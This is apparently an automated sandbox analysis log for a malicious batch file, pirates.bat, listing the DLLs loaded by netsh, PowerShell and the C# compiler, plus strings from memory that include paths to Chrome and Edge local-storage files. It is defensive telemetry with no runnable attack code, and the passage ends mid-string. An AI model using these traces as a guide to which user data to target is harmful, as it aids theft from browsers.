            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: pirates.batStatic file information: File size 3787378 > 1048576
            Source: Binary string: lambda_methodNet.Http.pdb source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000030.00000002.2347663937.000000C000498000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdb2"{ source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000030.00000002.2331375157.000000C0002C4000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbV_ source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ement.Automationp.pdby source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbDD2-7850-423A-B1D8-7882CE1A6D15.log source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdb source: powershell.exe, 00000028.00000002.2916812846.0000017E804BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: powershell.exe, 00000030.00000002.2331375157.000000C000136000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: powershell.exe, 00000030.00000002.2345550660.000000C00041E000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.pdbhP source: powershell.exe, 0000002C.00000002.2105443989.00000201CC1ED000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: grule230174v0.xmlrule230200v0.xmlrule700000v2.xmlrule700001v2.xmlrule700050v1.xmlrule700051v1.xmlrule700100v1.xmlrule700101v1.xmlrule700150v1.xmlrule700151v1.xmlrule700200v1.xmlrule700201v1.xmlrule700250v1.xmlrule700251v1.xmlrule700300v1.xmlrule700301v1.xmlrule700350v1.xmlrule700351v1.xmlrule700400v2.xmlrule700401v2.xmlrule700450v1.xmlrule700451v1.xmlrule700500v1.xmlrule700501v1.xmlrule700550v1.xmlrule700551v1.xmlrule700600v1.xmlrule700601v1.xmlrule700650v1.xmlrule700651v1.xmlrule700700v1.xmlrule700701v1.xmlC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\Settings\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\TempStateC:\Users\user\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\TempC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppDataC:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbweC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\ACC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SettingsC:\Users\user\AppData\Local\Packages\microsoft.windowscom
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000030.00000002.2331375157.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbpX source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: powershell.exe, 00000030.00000002.2331375157.000000C000116000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Net.Http\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.Http.pdb~ source: powershell.exe, 00000028.00000002.2916812846.0000017E804A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: $C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\TempC:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppDataC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbC:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.logr source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Net.Http.pdbtract source: powershell.exe, 00000028.00000002.2913711365.0000017E803CB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: pingme.txtntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000028.00000002.2914373114.0000017E803EC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdboAqN:: source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: p.pdb source: powershell.exe, 0000002C.00000002.2215777823.00000201E2FED000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: edbtmp.logIndexedDB.edbIndexedDB.jfmAppIconCacheConstraintIndexFlighting100ShellFeeds308046B0AF4A39CBChromeMSEdgeApps.ftApps.ftApps.indexApps.indexApps.ftapps.csgApps.indexapps.schemaACappsglobals.txtappssynonyms.txtsettings.csgsettings.schemaSettings.ftSettings.indexSettings.ftSettings.indexGLEAM-DARK.svgGLEAM-LIGHT.svgroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryMicrosoftcontainer.datESEcontainer.datCryptnetUrlCacheContentMetaDataroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryACAppDataLocalCacheLocalStateRoamingStateSettingsTempACSystemAppDataTempStateINetCacheINetCookiesINetHistoryAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryINetCacheTempINetCookiesINetHistoryroaming.lockACsettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateTempINetCacheINetCookiesINetHistoryHxStore.hxdACroaming.locksettings.datAppDataSettingsLocalCacheLocalStateRoamingStateSystemAppDataTempStateACroaming.locksettings.datINetCacheTempINetCookiesINetHistoryEXCELpingme.txtntkrnlmp.pdbwinload_prod.pdbdownload.errorntkrnlmp.pdbReadFile source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbgAyN; source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000030.00000002.2331375157.000000C0002FE000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ings source: powershell.exe, 00000030.00000002.2633346989.000002A872B26000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Net.Http.pdbmt"i source: powershell.exe, 00000028.00000002.2911098762.0000017E80381000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n.pdbWF source: powershell.exe, 00000028.00000002.2903523189.0000017E801DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: winload_prod.pdbdownload.error source: powershell.exe, 00000030.00000002.2331375157.000000C000006000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: WINLOA~1.PDB3( source: powershell.exe, 00000030.00000002.2347720192.000000C0004AA000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\FontsC:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\LicensesC:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\C:\Users\user\AppData\Local\SolidDocumentsC:\Users\user\AppData\Local\Temp{03477411-EFD2-45F5-9977-8217BABEF128} - OProcSessId.dat{39FD46B1-FE63-43EB-8B40-445FD746DDBB} - OProcSessId.dat{68EB49F3-8C14-4F42-9AAA-8A4F03F41DF8} - OProcSessId.dat{6E005F86-FF04-4920-857F-6AD6E14B3DC3} - OProcSessId.dat{A3E94280-ADEA-4163-99A3-23DF2BB55BDB} - OProcSessId.datC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\AcrobatC:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat\DCNGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.logNGLClient_AcrobatReader123.6.20320.6 2023-10-04 